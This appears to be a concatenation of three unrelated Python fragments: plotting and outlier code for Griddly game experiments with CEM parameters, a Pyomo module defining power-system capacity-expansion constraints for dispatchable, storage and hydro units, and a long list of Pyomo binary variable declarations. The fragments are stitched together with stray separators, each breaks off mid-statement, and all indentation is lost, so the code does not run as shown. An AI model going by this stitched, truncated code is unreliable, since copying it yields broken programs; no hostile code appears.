print('GameRules:', hi_outlier[0][0], 'MapParams:', hi_outlier[0][2], 'Value:', hi_outlier[1])
figure, axs = plt.subplots()
data = data_set.data
cem_param_pairs = get_cem_param_pairs(data)
avg_list_per_cem_pair = {pair: [] for pair in cem_param_pairs}
game_variant_batches = group_runs_by_params(data, ['GameRules', 'GriddlyDescription', 'MapParams'])
for game_variant_key, game_variant_batch in game_variant_batches.items():
variant_runs_per_cem = {cem_param: [] for cem_param in data['cem_params'].keys()}
for game_run in game_variant_batch:
variant_runs_per_cem[game_run['CemParams']].append(game_run)
avg_score_per_cem = {}
for cem_param, runs in variant_runs_per_cem.items():
avg_score = np.mean([run['Score'] for run in runs])
avg_score_per_cem[cem_param] = avg_score
for pair in cem_param_pairs:
avg_diff = avg_score_per_cem[pair[1]] - avg_score_per_cem[pair[0]]
avg_list_per_cem_pair[pair].append((game_variant_key, avg_diff))
cem_param_names = get_cem_param_names(data)
pd_ready_data = []
for pair, data_points in avg_list_per_cem_pair.items():
cem_pair_name = make_cem_param_name(cem_param_names, pair)
low_outliers, hi_outliers = find_outliers(data_points)
print_outliers(cem_pair_name, low_outliers, hi_outliers)
pd_ready_data += [(cem_pair_name, data_point[1]) for data_point in data_points]
data_frame = pd.DataFrame.from_records(pd_ready_data, columns=['cem_pair', 'score_diff_avg'])
axs = pt.RainCloud(x='cem_pair', y='score_diff_avg', data=data_frame, palette='Set1', ax=axs, order=['sup-ant', 'rnd-ant', 'rnd-sup'], orient='h', bw=0.2)
axs.xaxis.grid(visible=True)
axs.set_xlim(DIFF_X_LIM)
axs.set_title('Mean score differences\n' + data_set.name)
figure.set_size_inches(PAPER_WIDTH/2, PAPER_HEIGHT)
figure.set_tight_layout(True)
if save_folder:
figure.savefig(os.path.join(save_folder, data_set.file_prefix+'avg_diff_raincloud.svg'))
plt.close()
else:
plt.show()
def find_outliers(data_keys_and_values, outlier_const=1.5):
data_arr = np.array([pair[1] for pair in data_keys_and_values])
upper_quartile = np.percentile(data_arr, 75)
lower_quartile = np.percentile(data_arr, 25)
iqr = (upper_quartile - lower_quartile) * outlier_const
outlier_bounds = (lower_quartile - iqr, upper_quartile + iqr)
low_outliers = []
high_outliers = []
for data_key, data_val in data_keys_and_values:
if data_val < outlier_bounds[0]:
low_outliers.append((data_key, data_val))
elif data_val > outlier_bounds[1]:
high_outliers.append((data_key, data_val))
return low_outliers, high_outliers
def plot_all_action_frequencies(data_set, save_folder):
def get_action_name(env_, action):
return 'idle' if action[1] == 0 else env_.action_names[action[0]]
data = data_set.data
env = create_griddly_env('collector_game.yaml')
env.reset()
cem_name_lookup = get_cem_param_names(data)
labels = []
cem_keys = list(data['cem_params'])
cem_names = [cem_name_lookup[key] for key in cem_keys]
data_per_agent = []
for agent_i in range(env.player_count):
data_per_agent.append([[] for _ in cem_keys])
for game_run in data['game_runs'].values():
agent_in_turn = 0
cem_key = game_run['CemParams']
cem_idx = cem_keys.index(cem_key)
for full_action in game_run['Actions']:
agent_action = full_action[agent_in_turn]
action_name = get_action_name(env, agent_action)
if action_name not in labels:
labels.append(action_name)
for agent_i in range(env.player_count):
for data_list in data_per_agent[agent_i]:
data_list.append(0)
action_name_idx = labels.index(action_name)
data_per_agent[agent_in_turn][cem_idx][action_name_idx] += 1
agent_in_turn = (agent_in_turn + 1) % env.player_count
for agent_i in range(len(data_per_agent)):
for cem_i in range(len(data_per_agent[agent_i])):
sorted_by_labels = [sorted_data for _, sorted_data in sorted(zip(labels, data_per_agent[agent_i][cem_i]), key=lambda x: x[0])]
data_per_agent[agent_i][cem_i] = sorted_by_labels
labels.sort()
fig, ax = plot_grouped_bars('Frequency of Player actions with different CEM-parametrizations\n'+data_set.name+', linear scale', labels, data_per_agent[0], cem_names)
if save_folder:
fig.savefig(os.path.join(save_folder, data_set.file_prefix + 'plr_action_freq.svg'))
plt.close()
else:
plt.show()
fig, ax = plot_grouped_bars('Frequency of Player actions with different CEM-parametrizations\n'+data_set.name+', logarithmic scale', labels, data_per_agent[0], cem_names, 'log')
if save_folder:
fig.savefig(os.path.join(save_folder, data_set.file_prefix + 'plr_action_freq_log.svg'))
plt.close()
else:
plt.show()
fig, ax = plot_grouped_bars('Frequency of NPC actions with different CEM-parametrizations\n'+data_set.name+', linear scale', | |
<filename>scripts/md_CE_formula.py
#
# General Electricity sector Decarbonization Model (GEDM)
# Copyright (C) 2020 <NAME>.
# Licensed under the MIT License (see LICENSE file).
#
# Module note:
# Functions to construct CE model constraints
#
import pyomo.environ as pe
##### ---- dispatchable ----------------------------------------------- #####
def constUnitGen_Exist(model, objMarket):
''' generation constraints of existing dispatchable process '''
### gross power output of existing dispatchable units
def ruleProcessPowerOutGross_Disp(model, sProcDisp, sTimeSlice) :
# consider overall planned/forced outage, equivalent available factor
return model.vExProcDispPwOutGrs_TCD_TS[sProcDisp, sTimeSlice] \
<= model.pExProcDispCap_TCD[sProcDisp] * model.pExProcDispEAF_TCD[sProcDisp]
setattr(model, "conProcDispPwOutGross_TCD_TS", pe.Constraint(model.setProcBaseDisp_TCD, \
model.setTimeSlice_TS, rule = ruleProcessPowerOutGross_Disp))
### net power output of existing dispatchable units
def ruleProcessPowerOutNet_Disp(model, sProcDisp, sTimeSlice) :
return model.vExProcDispPwOutNet_TCD_TS[sProcDisp, sTimeSlice] \
== model.vExProcDispPwOutGrs_TCD_TS[sProcDisp, sTimeSlice] \
* (1-model.pExProcDispOUS_TCD[sProcDisp])
setattr(model, "conProcDispPwOutNet_TCD_TS", pe.Constraint(model.setProcBaseDisp_TCD, \
model.setTimeSlice_TS, rule = ruleProcessPowerOutNet_Disp))
return
def constUnitGen_New(model, objMarket):
''' generation constraints of new dispatchable process '''
### gross power output of new candidate dispatchable units
def ruleProcessPowerOutGross_Disp(model, sProcDisp, sTimeSlice) :
# consider overall planned/forced outage, equivalent available factor
return model.vNewProcDispPwOutGrs_TCD_TS[sProcDisp, sTimeSlice] \
<= model.vNewProcDispCap_TCD[sProcDisp] * model.pNewProcDispEAF_TCD[sProcDisp]
setattr(model, "conProcDispPwOutGrossNew_TCD_TS", pe.Constraint(model.setProcNewDisp_TCD, \
model.setTimeSlice_TS, rule = ruleProcessPowerOutGross_Disp))
### net power output of new candidate dispatchable units
def ruleProcessPowerOutNet_Disp(model, sProcDisp, sTimeSlice) :
return model.vNewProcDispPwOutNet_TCD_TS[sProcDisp, sTimeSlice] \
== model.vNewProcDispPwOutGrs_TCD_TS[sProcDisp, sTimeSlice] \
* (1-model.pNewProcDispOUS_TCD[sProcDisp])
setattr(model, "conProcDispPwOutNetNew_TCD_TS", pe.Constraint(model.setProcNewDisp_TCD, \
model.setTimeSlice_TS, rule = ruleProcessPowerOutNet_Disp))
return
##### ---- dispatchable (testing TS) ----------------------------------------------- #####
def constUnitGen_Exist_RT(model, objMarket):
''' generation constraints of existing dispatchable process on testing TS '''
### gross power output of existing dispatchable units
def ruleProcessPowerOutGross_Disp(model, sProcDisp, sTimeSlice) :
# consider overall planned/forced outage, equivalent available factor
return model.vExProcDispPwOutGrsTest_TCD_TS[sProcDisp, sTimeSlice] \
<= model.pExProcDispCap_TCD[sProcDisp] * model.pExProcDispEAF_TCD[sProcDisp]
setattr(model, "conProcDispPwOutGrossTest_TCD_TS", pe.Constraint(model.setProcBaseDisp_TCD, \
model.setTSRT_TS, rule = ruleProcessPowerOutGross_Disp))
### net power output of existing dispatchable units
def ruleProcessPowerOutNet_Disp(model, sProcDisp, sTimeSlice) :
return model.vExProcDispPwOutNetTest_TCD_TS[sProcDisp, sTimeSlice] \
== model.vExProcDispPwOutGrsTest_TCD_TS[sProcDisp, sTimeSlice] \
* (1-model.pExProcDispOUS_TCD[sProcDisp])
setattr(model, "conProcDispPwOutNetTest_TCD_TS", pe.Constraint(model.setProcBaseDisp_TCD, \
model.setTSRT_TS, rule = ruleProcessPowerOutNet_Disp))
return
def constUnitGen_New_RT(model, objMarket):
''' generation constraints of new dispatchable process on testing TS '''
### gross power output of new candidate dispatchable units
def ruleProcessPowerOutGross_Disp(model, sProcDisp, sTimeSlice) :
# consider overall planned/forced outage, equivalent available factor
return model.vNewProcDispPwOutGrsTest_TCD_TS[sProcDisp, sTimeSlice] \
<= model.vNewProcDispCap_TCD[sProcDisp] * model.pNewProcDispEAF_TCD[sProcDisp]
setattr(model, "conProcDispPwOutGrossNewTest_TCD_TS", pe.Constraint(model.setProcNewDisp_TCD, \
model.setTSRT_TS, rule = ruleProcessPowerOutGross_Disp))
### net power output of new candidate dispatchable units
def ruleProcessPowerOutNet_Disp(model, sProcDisp, sTimeSlice) :
return model.vNewProcDispPwOutNetTest_TCD_TS[sProcDisp, sTimeSlice] \
== model.vNewProcDispPwOutGrsTest_TCD_TS[sProcDisp, sTimeSlice] \
* (1-model.pNewProcDispOUS_TCD[sProcDisp])
setattr(model, "conProcDispPwOutNetNewTest_TCD_TS", pe.Constraint(model.setProcNewDisp_TCD, \
model.setTSRT_TS, rule = ruleProcessPowerOutNet_Disp))
return
##### ---- storage --------------------------------------------------- #####
def constStorageOpr_Exist(model, objMarket):
''' existing storage system operation constraints '''
### max hourly output of existing units (MW)
def ruleStorPowerOutMax(model, sProcStor, sTimeSlice) :
# only non-dispatchable generation
return model.vExProcStorPwOut_TCS_TS[sProcStor, sTimeSlice] \
<= model.pExProcStorCap_TCS[sProcStor] * model.pExProcStorEAF_TCS[sProcStor]
setattr(model, "conStorPowerOutMax_TCS_TS", pe.Constraint(model.setProcBaseStor_TCS, \
model.setTimeSlice_TS, rule = ruleStorPowerOutMax))
### max hourly input of new units (MW)
def ruleStorPowerInMax(model, sProcStor, sTimeSlice) :
# only non-dispatchable generation
return model.vExProcStorPwIn_TCS_TS[sProcStor, sTimeSlice] \
<= model.pExProcStorCap_TCS[sProcStor] * model.pExProcStorEAF_TCS[sProcStor]
setattr(model, "conStorPowerInMax_TCS_TS", pe.Constraint(model.setProcBaseStor_TCS, \
model.setTimeSlice_TS, rule = ruleStorPowerInMax))
### daily total generation constraint (MWh)
def ruleStorDayGen(model, sProcStor, setDay_DY) :
fCapacity = model.pExProcStorCap_TCS[sProcStor] * model.pExProcStorEAF_TCS[sProcStor] # MW
fMaxDayOutput = fCapacity * model.pExProcStorDur_TCS[sProcStor] # total stored energy, MW -> MWh
fDayOutput = 0
liTSInDay = model.pTSIndInDay_DY[setDay_DY].split(';')
for sTSIndex in liTSInDay:
iTSRepHour = model.pTSRepHourDay_TS[sTSIndex]
fDayOutput += model.vExProcStorPwOut_TCS_TS[sProcStor, sTSIndex] * iTSRepHour
return fDayOutput <= fMaxDayOutput
setattr(model, "conStorDayGen_TCS_DY", pe.Constraint(model.setProcBaseStor_TCS, \
model.setDay_DY, rule = ruleStorDayGen))
### daily input/output balance constraint
def ruleStorDayBalance(model, sProcStor, setDay_DY) :
fGrossEffeciency = model.pExProcStorEff_TCS[sProcStor]
fDayOutput = 0
fDayInput = 0
liTSInDay = model.pTSIndInDay_DY[setDay_DY].split(';')
for sTSIndex in liTSInDay:
iTSRepHour = model.pTSRepHourDay_TS[sTSIndex]
fDayOutput += model.vExProcStorPwOut_TCS_TS[sProcStor, sTSIndex] * iTSRepHour
fDayInput += model.vExProcStorPwIn_TCS_TS[sProcStor, sTSIndex] * iTSRepHour
return fDayInput == (fDayOutput / fGrossEffeciency)
setattr(model, "conStorDayBalance_TCS_DY", pe.Constraint(model.setProcBaseStor_TCS, \
model.setDay_DY, rule = ruleStorDayBalance))
return
def constStorageOpr_New(model, objMarket):
''' new storage system operation constraints '''
### max hourly output of new units (MW)
def ruleStorPowerOutMax(model, sProcStor, sTimeSlice) :
# only non-dispatchable generation
return model.vNewProcStorPwOut_TCS_TS[sProcStor, sTimeSlice] \
<= model.vNewProcStorCap_TCS[sProcStor] * model.pNewProcStorEAF_TCS[sProcStor]
setattr(model, "conStorPowerOutMaxNew_TCS_TS", pe.Constraint(model.setProcNewStor_TCS, \
model.setTimeSlice_TS, rule = ruleStorPowerOutMax))
### max hourly input of new units (MW)
def ruleStorPowerInMax(model, sProcStor, sTimeSlice) :
# only non-dispatchable generation
return model.vNewProcStorPwIn_TCS_TS[sProcStor, sTimeSlice] \
<= model.vNewProcStorCap_TCS[sProcStor] * model.pNewProcStorEAF_TCS[sProcStor]
setattr(model, "conStorPowerInMaxNew_TCS_TS", pe.Constraint(model.setProcNewStor_TCS, \
model.setTimeSlice_TS, rule = ruleStorPowerInMax))
### daily total generation constraint (MWh)
def ruleStorDayGen(model, sProcStor, setDay_DY) :
fCapacity = model.vNewProcStorCap_TCS[sProcStor] * model.pNewProcStorEAF_TCS[sProcStor] # MW
fMaxDayOutput = fCapacity * model.pNewProcStorDur_TCS[sProcStor] # total stored energy, MW -> MWh
fDayOutput = 0
liTSInDay = model.pTSIndInDay_DY[setDay_DY].split(';')
for sTSIndex in liTSInDay:
iTSRepHour = model.pTSRepHourDay_TS[sTSIndex]
fDayOutput += model.vNewProcStorPwOut_TCS_TS[sProcStor, sTSIndex] * iTSRepHour
return fDayOutput <= fMaxDayOutput
setattr(model, "conStorDayGenNew_TCS_DY", pe.Constraint(model.setProcNewStor_TCS, \
model.setDay_DY, rule = ruleStorDayGen))
### daily input/output balance constraint
def ruleStorDayBalance(model, sProcStor, setDay_DY) :
fGrossEffeciency = model.pNewProcStorEff_TCS[sProcStor]
fDayOutput = 0
fDayInput = 0
liTSInDay = model.pTSIndInDay_DY[setDay_DY].split(';')
for sTSIndex in liTSInDay:
iTSRepHour = model.pTSRepHourDay_TS[sTSIndex]
fDayOutput += model.vNewProcStorPwOut_TCS_TS[sProcStor, sTSIndex] * iTSRepHour
fDayInput += model.vNewProcStorPwIn_TCS_TS[sProcStor, sTSIndex] * iTSRepHour
return fDayInput == (fDayOutput / fGrossEffeciency)
setattr(model, "conStorDayBalanceNew_TCS_DY", pe.Constraint(model.setProcNewStor_TCS, \
model.setDay_DY, rule = ruleStorDayBalance))
### installation capacity limit (PHS)
def ruleStorInstLim(model, sProcStor) :
sTech = str(sProcStor).split("/")[1]
if sTech[0:6] == "HYD_PS":
return model.vNewProcStorCap_TCS[sProcStor] <= model.pNewProcStorCapLim_TCS[sProcStor]
else:
return pe.Constraint.Skip
setattr(model, "conStorInstLimNew_TCS_DY", pe.Constraint(model.setProcNewStor_TCS, rule = ruleStorInstLim))
return
##### ---- storage (Testing TS) ------------------------------------------------------- #####
def constStorageOpr_Exist_RT(model, objMarket):
''' existing storage system operation constraints on testing TS '''
### max hourly output of existing units (MW)
def ruleStorPowerOutMax(model, sProcStor, sTimeSlice) :
fMinOutput = model.pExProcStorCap_TCS[sProcStor] * model.pExProcStorEAF_TCS[sProcStor] \
* model.pNewProcStorDur_TCS[sProcStor] / 12
# only non-dispatchable generation
return model.vExProcStorPwOutTest_TCS_TS[sProcStor, sTimeSlice] <= fMinOutput
setattr(model, "conStorPowerOutMaxTest_TCS_TS", pe.Constraint(model.setProcBaseStor_TCS, \
model.setTSRT_TS, rule = ruleStorPowerOutMax))
return
def constStorageOpr_New_RT(model, objMarket):
''' new storage system operation constraints on testing TS '''
### max hourly output of new units (MW)
def ruleStorPowerOutMax(model, sProcStor, sTimeSlice) :
fMinOutput = model.vNewProcStorCap_TCS[sProcStor] * model.pNewProcStorEAF_TCS[sProcStor] \
* model.pNewProcStorDur_TCS[sProcStor] / 12
# only non-dispatchable generation
return model.vNewProcStorPwOutTest_TCS_TS[sProcStor, sTimeSlice] <= fMinOutput
setattr(model, "conStorPowerOutMaxNewTest_TCS_TS", pe.Constraint(model.setProcNewStor_TCS, \
model.setTSRT_TS, rule = ruleStorPowerOutMax))
return
##### ---- hydro ------------------------------------------------------- #####
def constHydropowerOpr_Exist(model, objMarket):
''' existing large hydropower operation constraints '''
### small hydro output
def ruleHydrPowerOutputSml(model, TechHydro, sTimeSlice) :
sTech = str(TechHydro).split("/")[1]
if sTech[0:6] == "HYD_SM":
# default generation
return model.vExProcHydrPwOut_TCH_TS[TechHydro, sTimeSlice] \
== model.pExProcHydrGen_TCH_TS[TechHydro, sTimeSlice]
else:
return pe.Constraint.Skip
setattr(model, "conHydrPwOutputSml_TCH_TS", pe.Constraint(model.setProcBaseHydr_TCH, \
model.setTimeSlice_TS, rule = ruleHydrPowerOutputSml))
### large hydro generation limit - upper bound
def ruleHydrPowerOutUpBnd(model, TechHydro, sTimeSlice) :
sTech = str(TechHydro).split("/")[1]
if sTech[0:6] == "HYD_LG":
fCapacity = model.pExProcHydrCap_TCH[TechHydro]
fEAF = model.pExProcHydrEAF_TCH[TechHydro]
return model.vExProcHydrPwOut_TCH_TS[TechHydro, sTimeSlice] <= fCapacity * fEAF
else:
return pe.Constraint.Skip
setattr(model, "conHydrPwOutUpBnd_TCH_TS", pe.Constraint(model.setProcBaseHydr_TCH, \
model.setTimeSlice_TS, rule = ruleHydrPowerOutUpBnd))
### large hydro generation limit - lower bound
def ruleHydrPowerOutLowBnd(model, TechHydro, sTimeSlice) :
iDispatchBase = 0.3
sTech = str(TechHydro).split("/")[1]
if sTech[0:6] == "HYD_LG":
### the lower limit is 30% CF, smaller than this is non-dispatchable (this does not subjected to EAF)
fCapacity = model.pExProcHydrCap_TCH[TechHydro]
defaultGen = float(model.pExProcHydrGen_TCH_TS[TechHydro, sTimeSlice])
if fCapacity > 0:
if (defaultGen / fCapacity) >= iDispatchBase:
return model.vExProcHydrPwOut_TCH_TS[TechHydro, sTimeSlice] >= fCapacity * iDispatchBase
else:
return model.vExProcHydrPwOut_TCH_TS[TechHydro, sTimeSlice] == defaultGen
else:
return model.vExProcHydrPwOut_TCH_TS[TechHydro, sTimeSlice] == 0
else:
return pe.Constraint.Skip
setattr(model, "conHydrPwOutLowBnd_TCH_TS", pe.Constraint(model.setProcBaseHydr_TCH, \
model.setTimeSlice_TS, rule = ruleHydrPowerOutLowBnd))
### large hydro generation daily dispatch
def ruleHydrPowerOutDispatch(model, TechHydro, setDay):
iDispatchBase = 0.3
sTech = str(TechHydro).split("/")[1]
if sTech[0:6] == "HYD_LG":
fCapacity = model.pExProcHydrCap_TCH[TechHydro] # MW
if fCapacity > 0:
liTSInDay = model.pTSIndInDay_DY[setDay].split(';')
defaultGen = float(model.pExProcHydrGen_TCH_TS[TechHydro, model.setTimeSlice_TS[1]])
if (defaultGen / fCapacity) >= iDispatchBase:
# total dispatchable
total_dispatchable = 0
for sTSIndex in liTSInDay:
iTSRepHour = model.pTSRepHourDay_TS[sTSIndex]
hourGen = float(model.pExProcHydrGen_TCH_TS[TechHydro, sTSIndex])
total_dispatchable = total_dispatchable + (hourGen * iTSRepHour) # MWh
# total generation
total_generation = 0
for sTSIndex in liTSInDay:
iTSRepHour = model.pTSRepHourDay_TS[sTSIndex]
hourGen = model.vExProcHydrPwOut_TCH_TS[TechHydro, sTSIndex]
total_generation = total_generation + ( hourGen * iTSRepHour )
return total_generation == total_dispatchable
else:
return pe.Constraint.Skip # CF is too low, non-dispatchable
else:
return pe.Constraint.Skip
else:
return pe.Constraint.Skip
setattr(model, "conHydrPwOutOpr_TCH_DY", pe.Constraint(model.setProcBaseHydr_TCH, \
model.setDay_DY, rule | |
= Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b597 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b598 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b599 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b600 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b601 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b602 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b603 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b604 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b605 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b606 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b607 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b608 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b609 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b610 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b611 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b612 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b613 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b614 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b615 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b616 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b617 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b618 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b619 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b620 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b621 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b622 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b623 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b624 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b625 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b626 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b627 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b628 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b629 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b630 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b631 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b632 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b633 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b634 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b635 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b636 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b637 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b638 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b639 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b640 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b641 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b642 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b643 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b644 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b645 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b646 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b647 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b648 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b649 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b650 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b651 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b652 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b653 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b654 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b655 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b656 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b657 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b658 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b659 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b660 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b661 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b662 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b663 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b664 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b665 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b666 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b667 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b668 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b669 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b670 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b671 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b672 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b673 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b674 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b675 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b676 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b677 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b678 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b679 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b680 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b681 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b682 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b683 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b684 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b685 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b686 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b687 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b688 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b689 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b690 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b691 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b692 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b693 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b694 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b695 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b696 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b697 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b698 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b699 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b700 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b701 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b702 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b703 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b704 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b705 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b706 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b707 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b708 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b709 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b710 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b711 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b712 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b713 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b714 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b715 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b716 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b717 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b718 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b719 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b720 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b721 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b722 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b723 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b724 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b725 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b726 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b727 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b728 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b729 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b730 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b731 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b732 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b733 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b734 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b735 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b736 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b737 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b738 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b739 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b740 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b741 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b742 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b743 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b744 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b745 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b746 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b747 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b748 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b749 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b750 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b751 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b752 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
